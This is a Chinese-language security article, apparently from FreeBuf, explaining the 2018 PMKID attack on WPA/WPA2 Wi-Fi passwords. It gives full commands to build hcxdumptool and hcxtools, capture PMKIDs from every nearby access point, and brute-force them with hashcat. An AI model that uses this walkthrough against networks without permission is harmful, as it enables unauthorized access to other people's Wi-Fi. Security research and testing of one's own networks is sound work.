专栏首页FreeBuf无需四次握手包破解WPA&WPA2密码

无需四次握手包破解WPA&WPA2密码

知名密码破解软件Hashcat在2018年8月2日发布了4.2版本,这次版本更新的主要内容是增加了4个新的密码算法支持。

其中的WPA-PMKID-PBKDF2算法,是为了支持一种新的WAP预共享密钥密码破解方法。

New attack on WPA/WPA2 using PMKID

根据Hashcat官方论坛文章介绍,作者在研究WPA3安全标准时,意外发现的使用PMKID破解WPA预共享密钥的方法,与现有的其它破解方法不同,该方法不再需要抓取完整的EAPOL四次握手包,只需要一个EAPOL帧中的RSN IE(Robust Security Network Information Element)即可。目前,作者尚不清楚该攻击方法对哪些路由器生效,但仍认为可以有效的攻击所有启用了漫游功能的802.11i/p/q/r网络(大部分较新的路由器都支持)。

该方法注意的优势如下:

1.攻击者直接与AP通信,无需普通用户参与(即“无客户端”攻击);

2.无需等待普通用户与AP完成四次握手;

3.无需重传EAPOL帧(重传可能导致无法破解);

4.无需普通用户发送无效密码;

5.不再会因为攻击者离AP或普通用户太远丢失EAPOL帧;

6.无需修复nonce和replaycounter值;

7.无需特定的输出格式,最终数据以16进制编码字符串呈现。

相关工具

该攻击方法需要用到以下几个工具:

1.hcxdumptool v4.2.0 or higher;

2.用于抓包并保存为Hashcat破解可用的格式;

3.支持的无线网卡:

USB ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter

USB ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter

USB ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter

USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter

USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter

hcxtools v4.2.0 or higher

hashcat v4.2.0 or higher

实战演示

本次演示环境:

Kali 2018.3(Linux内核版本4.17) + Tenda W311M无线网卡(MT7601U)

编译安装相关工具

hcxdumptool

下载源码编译(使用root运行,Linux内核版本>=4.14)
https://github.com/ZerBea/hcxdumptool/archive/4.2.0.tar.gz
tarf -xvf 4.2.0.tar.gz
cd hcxdumptool-4.2.0
make && make install
# 编译完成后的工具均安装在/usr/local/bin/目录下

hcxtools

# 安装依赖软件包,解决编译报错
apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev
#下载源码编译(使用root运行)
wget https://github.com/ZerBea/hcxtools/archive/4.2.0.tar.gz
tar -xvf 4.2.0.tar.gz
cd hcxtools-4.2.0 
make && make install
# 编译完成后的工具均安装在/usr/local/bin/目录下。

Hashcat

官方提供已编译好的二进制文件,包含Windows及Linux版本,下载解压即可。

# 下载Hashcat 4.2
wget https://hashcat.net/files/hashcat-4.2.0.7z
# 解压
7z x hashcat-4.2.0.7z

PMKID介绍

RSN IE(Robust Security Network Information Element)是8.2.11管理帧中的一个可选字段,其中的一个信息元素就是PMKID。

PMKID使用HMAC-SHA1算法计算得到,密钥为PMK,数据部分由固定的字符串标签“PMK Name”、AP的MAC地址及基站的MAC地址拼接组成,计算公式如下:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

因为PMK和普通的四次握手中的相同,因此PMKID是一个理想的攻击向量,破解所需的所有信息都可以从接收到的AP第一个EAPOL帧中得到。

抓取PMKID

hcxdumptool可以从AP请求PMKID并保存接收到的数据帧到文件中(pcapng格式)。

# 使用网卡wlan0,开启Monitor模式,
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up
# 查看可用的无线网卡
hcxdumptool -I
# 抓取管理帧和EAP/EAPOL帧,保存文件为pmkid.pacpng,开启状态显示
# 未添加AP过滤时,攻击端将对所有扫描到的AP发送协商请求。
hcxdumptool -o pmkid.pacpng -i wlan0 --enable_status

如果AP接受到攻击端的协商请求包并支持发送PMKID,过一会儿将看到“FOUND PMKID”的提示。

由于Wifi信道干扰等原因,可能需要过一段时间才能接收到PMKID,在你放弃前,建议耐心的等上10分钟。

数据格式转换

抓取的PMKID后,使用hcxpcaptool工具转换成Hashcat支持的格式。

$ ./hcxpcaptool -z pmkid.16800 pmkid.pcapng

转换后的文件内容:

以*符号分割的4列内容分别是:

1.PMKID

2.MAC AP

3.MAC Station

4.ESSID

通过MAC AP,可以查找到对应的WIFI名称。

密码破解

接下来,使用Hashcat破解抓取到的PMKID内容。

# 指定hash模式为16800,使用暴力破解方式,设置掩码为8个数字
hashcat -m 16800 pmkid.16800 -a 3 -w 3 '?d?d?d?d?d?d?d?d'

顺利的话,你将看到这样的结果,密码破解成功:

相关链接

Hashcat v4.2.0 https://hashcat.net/forum/thread-7711.html

New attack on WPA/WPA2 using PMKID https://hashcat.net/forum/thread-7717.html

*本文原创作者:Shad0wpf_,本文属FreeBuf原创奖励计划,未经许可禁止转载

本文分享自微信公众号 - FreeBuf(freebuf)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2018-08-15

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Mac OS下的wifi自动破解工具xwifi

    由于macOS下有两个缺陷,目前没有合适的wifi破解方案,于是作者写了这样一个支持macOS新版本系统下的wifi破解工具xwifi,可以在新版本macOS上...

    FB客服
  • Wolf CMS 新旧两个版本中的文件上传漏洞分析

    一、Wolfcms简介 Wolf CMS是一款内容管理系统(CMS),是在GNUGeneral Public License v3下发布的免费软件。Wolf C...

    FB客服
  • CVE-2020-0646:SharePoint中的远程代码执行漏洞分析

    2019年11月份,安全研究人员在微软SharePoint Online的工作流中发现了一个代码注入漏洞,并将其上报给微软公司。攻击者一旦成功利用该漏洞,将能够...

    FB客服
  • Elasticsearch项目实战,商品搜索功能设计与实现!

    在SpringBoot中使用Elasticsearch本文不再赘述,直接参考《mall整合Elasticsearch实现商品搜索》即可。这里需要提一下,对于需要...

    macrozheng
  • 2.Elasticsearch和Java交互 -- java操作es

    如果你正在使用 Java,在代码中你可以使用 Elasticsearch 内置的两个客户端:

    IT云清
  • Python在日常中的使用

    今天想要整理下电脑硬盘的文件,只要一些有用的方便共享,然后发现文件组织结构是这个样子的

    数据处理与分析
  • 安卓基础干货(二):安卓测试以及解析

    緣來
  • VR在医疗上的成长,会使其成为癌症中的“药神”么

    7月5日,影片《我不是药神》提前上映了。这部围绕着慢性粒细胞性白血病(简称慢粒白血病)而讲述的电影,将“看病求药难”这一话题推上了热议。

    VRPinea
  • 一次由查询转换引起的性能问题的分析

    作者介绍 郭成日 云和恩墨北区技术工程师 专注于SQL审核和优化相关工作。曾经服务的客户涉及金融保险、电信运营商、政府、生产制造等行业。 在优化器进行查询转换...

    数据和云
  • 快速学习-RestFul接口设计

    随着互联网的发展, 尤其是移动互联为代表的Web3.0时代. 客户端层出不穷, 以APP、微信、PC浏览器为代表, 服务端业务逻辑是基本一致的。那么有没有一种方...

    cwl_java

扫码关注云+社区

领取腾讯云代金券